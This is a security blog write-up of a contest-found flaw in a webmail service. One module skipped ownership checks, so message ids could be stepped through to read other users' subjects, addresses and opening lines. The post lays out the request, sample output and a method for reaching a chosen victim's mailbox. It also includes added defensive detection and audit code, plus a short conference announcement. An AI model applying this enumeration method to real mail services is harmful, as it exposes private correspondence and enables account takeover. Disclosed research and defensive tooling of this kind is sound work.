<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The beginning</span><br />
<br />
<br />
<a name='more'></a><br /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">When the contest was announced, I, as head of the audit department at Digital Security, did not want to take part in it (I am afraid of contests in general, and bosses have other important things to do: give someone an order, or demand a report… </span><img id="bxid_458605" src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_cool.gif" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="Cool" /><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">), but, as always, curiosity and the thirst for profit dictated their own terms. I decided to look for something interesting and fun, so I chose not to spend time searching for vulnerabilities such as XSS and CSRF. First, they are found automatically when studying any script (in fact, a couple of XSS turned up right away). Second, it is not interesting (although dangerous, as </span><a href="http://habrahabr.ru/users/kyprizel/" id="bxid_378967" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">kyprizel</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> showed in the same </span><a href="http://www.youtube.com/watch?v=E0anE1R_OJI" id="bxid_800456" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">contest</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">). Besides, since the contest scope was gigantic, I decided to limit myself to the service most interesting to me: mail. I also decided not to spend more than one working day, so as not to be distracted from work. This let me not worry that I would find nothing, since there was no time (self-justification, yep!), and look for something really hilarious. In any case, to begin with I simply had to study the structure and logic of the web interface. 
This was done in a banal way: with </span><a href="http://portswigger.net/burp/" id="bxid_897322" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">BurpSuite</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> and the developer tools built into Google Chrome. </span><br />
<br />
<img id="bxid_681324" src="http://www.securitylab.ru/upload/blog/ec4/ec4f7d5b8e7b38acb404e1ff005c6360.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Anton Karpov aka toxa (</span><a href="http://habrahabr.ru/users/tokza/" id="bxid_779577" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">tokza</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">) explains how the bugs found will be scored.</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">FrontEnd</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The main script that delivers mail content is a certain handlers.jsx. Notably, the developers themselves willingly share information about the mail architecture, so we know that in this case we are dealing with </span><a href="http://download.yandex.ru/company/experience/subbotnik/chel_androsov.pdf" id="bxid_774399" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">server-side JavaScript</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. However, I did not need all these subtleties, because the very first vulnerability found there turned out to be so classic that the implementation details are not that significant. But first, the general details:</span><br />
<br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>A request to handlers.jsx can be either POST or GET</li>
<li>The request specifies the required module and its corresponding parameters</li>
<li>The response to the request is content in XML form</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Some modules and their meaning:</span><br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>“folders” – folder contents</li>
<li>“message-body” – message body</li>
<li>“nearest-messages” – neighboring messages</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">To make it clearer, here is a screenshot from the same presentation by Alexey Androsov. </span><br />
<br />
<img id="bxid_866091" src="http://www.securitylab.ru/upload/blog/612/612f63537b68f468c80015a205ddcc55.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">That is, you can see that all content is assembled into a common interface by means of AJAX requests and brought into a "human" form by XSL templates.</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">And an example request from the same presentation:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">/handlers.jsx?_handlers.0=message&ids=1234567890&_handlers.1=message&ids=1234567891</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The response as XML:</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handlers> <handler name="message" key="_h=message&ids=1234567890"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> <!-- data --> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </handler> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handler name="message" key="_h=message&ids=1234567891"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> <!-- data --> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </handler> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></handlers> </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Everything seems simple. The _handlers parameter determines the data we need (the handler module), and ids is the identifier. That is, this example request loads the messages with identifiers 1234567890 and 1234567891. Naturally, the first thing I tried was to substitute ids and put in, say, 123431337, which ideally should have returned the message with that identifier to me, even if it is not mine. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">It did not work for me. By the way, my colleague and friend </span><a href="http://habrahabr.ru/users/chipik/" id="bxid_871742" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">chipik</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> tried the same thing. Last year the two of us had already been hacking Google together (and we wrote about </span><a href="http://habrahabr.ru/company/dsec/blog/140882/" id="bxid_696754" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">how it went</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">). But it did not work for him either. Yet here is the funny thing: there is such a notion as "code coverage". That is, by performing a certain test action, we tested a part of the code. It is logical to assume that if you try substituting the module name, the same code is still responsible for checking access authorization by the ids identifier. But a bit of luck helped me understand that this is not so. </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The bug</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">After a while I decided to substitute ids again, but this time for another module, “</span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">nearest-messages</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">”, and lo and behold… At first I did not even understand how it happened, but later I confirmed that this is the only module that does not check whether the message ids belongs to the current user. This means that with this module I could load the "neighboring messages" of other users of the server! Let's examine a legitimate request:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">http:// mail.yandex.ru/neo2/handlers/handlers.jsx?_handlers=message-nearest&ids=2020000002590081157</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">2020000002590081157 is the ids of my message, a quite specific and definite one. To this request the Yandex server returns:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">(... – cut to reduce the volume)</span><br />
<br />
<br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handlers> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handler name="message-nearest" gid="0" key="_handler=message-nearest&ids=2020000002590081157"> <message-nearest> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><list> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><message id="2020000002590182740"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><thread id="2020000001499988536"/> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><folder id="2020000650059912118"/> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><date> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><timestamp>1320143331000</timestamp></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><iso>2011-11-01T14:28:51</iso></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><short>01.11.11</short></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><full>1 ноя. 2011 в 14:28</full></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></date></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><size>2 КБ</size></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><last_status/></span><br />
<b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><subject fwd="Fwd:">TEST</subject></b><br />
<br />
<b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><firstline>Привет, это тестовое письмо номер 2</firstline></b><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><to> </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><name>ne_eik01110d111@yandex.ru</name> </b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. . . </to> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><from> <name>SSS AAA</name> . . . </from> </span><br />
<b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><reply-to> <name>ddookie1@inbox.ru</name> </b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">… </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></message> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><message id="2020000002590081157"></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">..</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></message> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><message id="2020000002590076913"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> . . . </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></message> </list> </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><timer_db>266</timer_db> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><timer_logic>175197</timer_logic> </message-nearest> </handler> </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><login>ne_eik01110d111</login> <actual-version>5.11.55</actual-version> <timestamp>1335882564270</timestamp> </handlers> </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The server returns XML with three objects. Each object is information about a message:</span><br />
<br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>When</li>
<li>From whom</li>
<li>To whom</li>
<li>Subject</li>
<li>First line of the message body</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Moreover, the message whose ids is specified in the request comes as the second object. The first and third objects are the neighboring messages in the same folder as the requested object. By changing ids, for example, by one, we get </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">three</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> messages belonging to someone else. More precisely: the date received, the subjects, the addressees, the ids identifier and the first line of the message. But in fact the first line is not just the first line! Experience showed that it can include </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">several</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> lines, and what matters here is the volume and the number of line breaks. In my experiments there were results with as many as 5 lines! That is, the volume is large enough to speak of a real threat.</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Sent in the message body (in the test text, “строка N” means “line N”):</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Привет – строка 1</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Ага, это тесто – строка 3</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Ха-ха-ха-ха-ха-хавыавыаывавыавыавыавыавыавыа – строка 4</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыы – строка 5</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыфыф – строка 6</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Пока – 8 </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Твой тестер! – 9</span><br />
<br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Intercepted via handlers.jsx:</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><firstline> – строка 1 Ага, это тесто – строка 3 Ха-ха-ха-ха-ха-хавыавыаывавыавыавыавыавыавыа – строка 4 фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыы – строка 5 фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыфыф – строка 6 Пока </firstline> </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">As you can see, this volume of data is enough to violate confidentiality and even to hijack accounts on services that send registration data by e-mail (for example, Facebook).</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Not quite enough</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">In general, everything is clear: the bug is as simple as they come, but there are a couple of questions:</span><br />
<br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>How to get access to the RIGHT mailbox?!</li>
<li>How to get the RIGHT message in the mailbox?</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">These are exactly the questions any sensible attacker interested in more pinpoint, targeted attacks would ask. After all, we are dealing with ids, and we do not always (almost never) get to know the ids of the adversary's message. Thus the attack becomes a bit more dangerous and interesting from a technical standpoint (almost anyone can substitute ids, but working it out…)</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">And there are some more details, which were also established experimentally. It turns out that ids is not just the identifier of a message or folder; it is effectively an object. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The first 4 digits are the number of the node (I do not know the proper term, so that is what I will call it) on which the mailbox is hosted. If you look closely, you will notice that this number is constant across all your messages and folders. Therefore, with the discovered vulnerability you can read messages only from THE SAME node where your mailbox resides. There are several billion messages on one node! There are many nodes, and two users who register at the same time can end up on different nodes. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">In the middle is the type identifier, folder or message (00 for a message, 65 for a folder, it seems), and the last digits are the identifier of the message on the node. It is only this last part that can be changed. That is, in my example the current message had the number 259008115</span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">7</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. Now you have a rough idea of the volume of messages on one node. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The second amusing fact: the message identifier is an absolute, incrementing value. That is, the next message processed (received) by the current node will be 259008115</span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">8</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. Even if that message is not addressed to me. Now BOTH problems can be solved. That is, to carry out a targeted attack rather than dumbly dump a billion messages </span><img id="bxid_458605" src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_cool.gif" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="Cool" /><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">The attack</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">You need to create a mailbox on the same node as the victim's. This is hard to do if the victim's mailbox was registered long ago. One can buy or hijack mailboxes from different nodes and register mailboxes on those nodes where that is possible. But if the victim's mailbox was created recently, the attack has a one hundred percent probability of success. So, for example, we will attack the mailbox </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">target-mail1</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">@yandex.ru. It was created recently, so the chance of success is high. So, we create a bunch of mailboxes: </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">check-mail1</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">check-mail2</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">check-mail3</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> and so on. The main thing is that all the created mailboxes are on different nodes. Then we send a message to target-mail1 and put all the mailboxes we created in copy. </span><br />
<br />
<img id="bxid_342464" src="http://www.securitylab.ru/upload/blog/41e/41ed5e5fcf09fa915e9e8840697918fd.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">What is the trick? When we see the ids of the message in our “check-mail” accounts, we try incrementing and decrementing that value by 5 units. And on the node where check-mailN coincided with target-mail1, we will see our message. See the example:</span><br />
<br />
<img id="bxid_798786" src="http://www.securitylab.ru/upload/blog/18d/18d00e1b26e06c923d9bd3ccd879445c.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">This is how we can get access to the target mailbox. And what about the target message? Well, if you recall, the module through which we exploit the vulnerability shows us the neighboring messages in the same folder of the same mailbox (remember that the script shows </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">three</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> messages: the one specified in ids and two neighbors from the same mailbox). If the selected message is the last one, we are shown only two messages: the current one and the previous one, including its ids. This means we can pick that ids for the next request: then we will see it as the second object in the XML response, and the third will be an even older message. Then we take its ids in turn, and so we "slide" down until we have read all the messages stored in the folder and found the one we are after.</span><br />
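<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">On the defending side, the probing described above leaves a recognisable trace in request logs. The sketch below is an added example, not Yandex code: it flags logins that request ids the server never returned to them and counts how many of those lie within a few units of an id the login does hold. The log line format, the ISSUED/REQ event names, the thresholds and the premise that a normal client only asks for ids it was given are assumptions, and the sample lines are constructed.</span><br />

```javascript
// Added example, not Yandex code. Log format, names and thresholds are assumptions.
// Constructed sample log: "<login> <ISSUED|REQ> <module> <comma-separated ids>"
//   ISSUED = ids the server returned to this login, REQ = ids the login asked for.
const SAMPLE_LOG = [
  'alice ISSUED folders 2020000002590081157,2020000002590076913',
  'alice REQ message-body 2020000002590081157',
  'alice REQ message-nearest 2020000002590081157',
  'mallory ISSUED folders 2020000002590081200',
  'mallory REQ message-nearest 2020000002590081200',
  'mallory REQ message-nearest 2020000002590081201',
  'mallory REQ message-nearest 2020000002590081199',
  'mallory REQ message-nearest 2020000002590081202',
  'mallory REQ message-nearest 2020000002590081198',
];

// ids are 19 digits long, beyond Number.MAX_SAFE_INTEGER, so distances use BigInt.
function absBig(n) {
  return n < 0n ? -n : n;
}

// Returns one alert per login that requested at least minUnissued ids it was never given.
function findIdProbing(lines, minUnissued = 3, maxStep = 5n) {
  const issued = new Map();   // login -> Set of ids handed out to that login
  const suspects = new Map(); // login -> { handlers, ids, nearOwn }
  for (const line of lines) {
    const m = /^(\S+) (ISSUED|REQ) (\S+) ([\d,]+)$/.exec(line);
    if (!m) continue; // not a line in the assumed format
    const [, login, kind, handler, idList] = m;
    if (!issued.has(login)) issued.set(login, new Set());
    const known = issued.get(login);
    for (const id of idList.split(',')) {
      if (kind === 'ISSUED') { known.add(id); continue; }
      if (known.has(id)) continue; // normal: the client asks for an id it was given
      if (!suspects.has(login)) {
        suspects.set(login, { handlers: new Set(), ids: [], nearOwn: 0 });
      }
      const s = suspects.get(login);
      s.handlers.add(handler);
      s.ids.push(id);
      // The pattern from the text: an id the login holds, plus or minus a few units.
      if ([...known].some((k) => absBig(BigInt(id) - BigInt(k)) <= maxStep)) {
        s.nearOwn += 1;
      }
    }
  }
  return [...suspects]
    .filter(([, s]) => s.ids.length >= minUnissued)
    .map(([login, s]) => ({
      login,
      handlers: [...s.handlers],
      unissued: s.ids.length,
      nearOwn: s.nearOwn,
    }));
}
```
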
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Conclusions</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Code coverage in penetration tests and fuzzing is sometimes the key parameter. Here we saw an excellent example: everyone tried changing ids for the “message-body” module, saw that the request did not go through, and therefore did not run the same tests against other, less obvious modules.</span><br />
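The coverage point above, as an added example that is not part of the original post: a constructed Python model with one ownership gate and an audit loop that calls every module accepting ids with a message the session user does not own. The data, the function names and every module name except “message-body” are assumptions made for the illustration.<br />

```python
# Constructed sample data: message id -> (owning mailbox, subject).
MESSAGES = {
    1001: ("check-mail1", "probe letter"),
    1002: ("target-mail1", "probe letter"),
    1003: ("target-mail1", "private letter"),
}

class Forbidden(Exception):
    """Raised when the session user does not own the requested message."""

def load_owned(user, ids):
    # Single authorization gate: the id must resolve to a message of `user`.
    msg = MESSAGES.get(ids)
    if msg is None or msg[0] != user:
        raise Forbidden(ids)
    return msg

def neighbours(owner, ids):
    # The requested message plus the adjacent ones from the same mailbox.
    box = sorted(i for i, (o, _) in MESSAGES.items() if o == owner)
    pos = box.index(ids)
    return [MESSAGES[i][1] for i in box[max(pos - 1, 0):pos + 2]]

def message_body(user, ids):
    # The module everyone tested: ownership is enforced.
    return [load_owned(user, ids)[1]]

def message_nearby_unchecked(user, ids):
    # Hypothetical module: mailbox is derived from the id, not the session.
    return neighbours(MESSAGES[ids][0], ids)

def message_nearby_checked(user, ids):
    # Same module after the fix: gate first, then scope to the session user.
    load_owned(user, ids)
    return neighbours(user, ids)

MODULES = {
    "message-body": message_body,
    "nearby-unchecked": message_nearby_unchecked,
    "nearby-checked": message_nearby_checked,
}

def audit(user, foreign_id):
    """Return names of modules that serve a message `user` does not own."""
    leaking = []
    for name, handler in MODULES.items():
        try:
            handler(user, foreign_id)
            leaking.append(name)
        except Forbidden:
            pass
    return leaking
```

Run as a regression test, the audit has to cover every registered module, so a module added later without the gate is reported by name.<br />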
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Although the vulnerability is simple, the attack itself is fairly complex and requires analysing how ids are generated and how the nodes are architected. Exploiting a vulnerability is more interesting than just looking for a “hole”. It was an interesting challenge to steal a specific email from a specific mailbox. It is hard for old mailboxes, but still possible, and for freshly created mailboxes the probability of success is 100%. For old ones it depends on whether you can get a mailbox on the same node. Statistics for fresh registrations: every third or fourth created mailbox lands on the same node. The period during which registration on a node is possible, counted from its launch, is about half a year (that is, a “new”/“freshly created” mailbox is one created no more than half a year ago). In theory, once half a year has passed, you can no longer register on that node, as I guess, because it is overloaded.</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Acknowledgements:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">To Anton Karpov (</span><a href="http://habrahabr.ru/users/tokza/" id="bxid_631088" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">tokza</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">) and Yandex, for the interesting challenge and contest, and for second place. After all, vulnerabilities are everywhere, and a contest like this helped close many of them!</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">To Dmitry Chastukhin (</span><a href="http://habrahabr.ru/users/chipik/" id="bxid_454734" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">chipik</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">), for not getting too upset when he learned about a bug he had “already checked”…</span><br />
<a href="http://habrahabr.ru/users/d0znpp/" id="bxid_179720" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">d0znpp</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><a href="http://habrahabr.ru/users/kyprizel/" id="bxid_556513" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">kyprizel</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><a href="http://habrahabr.ru/users/ptsecurity/" id="bxid_768086" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">ptsecurity</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">: for taking part in the contest and for finding scary holes, which kept me from relaxing all month (I hate contests).</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">And finally, the proof video…</span><br />
<br />
<a href="http://www.youtube.com/watch?feature=player_embedded&v=WWU7MXYT5D8" id="bxid_73529" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">http://www.youtube.com/watch?feature=player_embedded&v=WWU7MXYT5D8</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Bye, everyone!</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">PS: Since I am not a Yandex employee, the details of the architecture, the algorithms and the names may be inaccurate. All conclusions about how Yandex.Mail works are based on the author's gut feeling and intuition.</span>
</div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-23160779606654445912012-05-21T05:41:00.001-07:002012-05-21T05:41:46.755-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="margin-bottom: .0001pt; margin: 0cm;">
<span style="font-size: 13.5pt;">We are at conferences.<o:p></o:p></span></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<br /></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<span style="font-size: 13.5pt;">On 24 and 25 May my colleagues Dima Evdokimov and Sasha Minozhenko will go to
Krakow for CONFidence. Unfortunately, because of temporary visa problems I will miss
this event. I am very sad about it, because CONFidence is a wildly fun event with
a unique atmosphere. Besides, one of the speakers in Krakow will be
Captain Crunch himself (for those who do not know: <a href="http://en.wikipedia.org/wiki/John_Draper">http://en.wikipedia.org/wiki/John_Draper</a>).
I will also note that the Russian delegation of speakers will be joined by comrades from Moscow:
Andrey Petukhov and Karim Valiev. <o:p></o:p></span></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<br /></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<span style="font-size: 13.5pt;">On 30 and 31 May an equally remarkable event will take place: PHDays. That one
I will attend, as will many other guys from D</span><span lang="EN-US" style="font-size: 13.5pt;">SEC</span><span style="font-size: 13.5pt;"> and DCG 7812. So, I hope, it will be
fun 8)<o:p></o:p></span></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<br /></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<span style="font-size: 13.5pt;">P.S. By the way, we have also prepared a T-shirt for the contest at PHDays,
similar to the one for which Denis from </span><span lang="EN-US" style="font-size: 13.5pt;">PT</span><span style="font-size: 13.5pt;"> won a prize at Zeronights 8)</span><span lang="EN-US" style="font-size: 13.5pt;"><o:p></o:p></span></div>
<div style="margin-bottom: .0001pt; margin: 0cm;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0cm;">
<span lang="EN-US" style="font-size: 13.5pt;">P</span><span style="font-size: 13.5pt;">.</span><span lang="EN-US" style="font-size: 13.5pt;">P</span><span style="font-size: 13.5pt;">.</span><span lang="EN-US" style="font-size: 13.5pt;">S</span><span style="font-size: 13.5pt;"><o:p></o:p></span></div>
<div style="margin-bottom: .0001pt; margin: 0cm;">
<span style="font-size: 13.5pt;">Sasha Minozhenko and I will talk about hacking the </span><span lang="EN-US" style="font-size: 13.5pt;">VMware</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span lang="EN-US" style="font-size: 13.5pt;">vCenter</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span style="font-size: 13.5pt;"> server, and also
about one 0-day that is not patched. The guys from </span><span lang="EN-US" style="font-size: 13.5pt;">VMware</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span style="font-size: 13.5pt;">are worried about this, but in fact this 0-day
is hard to exploit without an additional bug, which we found in </span><span lang="EN-US" style="font-size: 13.5pt;">VMware</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span lang="EN-US" style="font-size: 13.5pt;">vCenter</span><span style="font-size: 13.5pt;"> (a </span><span lang="EN-US" style="font-size: 13.5pt;">web</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span style="font-size: 13.5pt;">bug). We reported only the second bug to them, so it
is patched, and therefore the first one is now hard to exploit (until
someone finds another similar bug).<o:p></o:p></span></div>
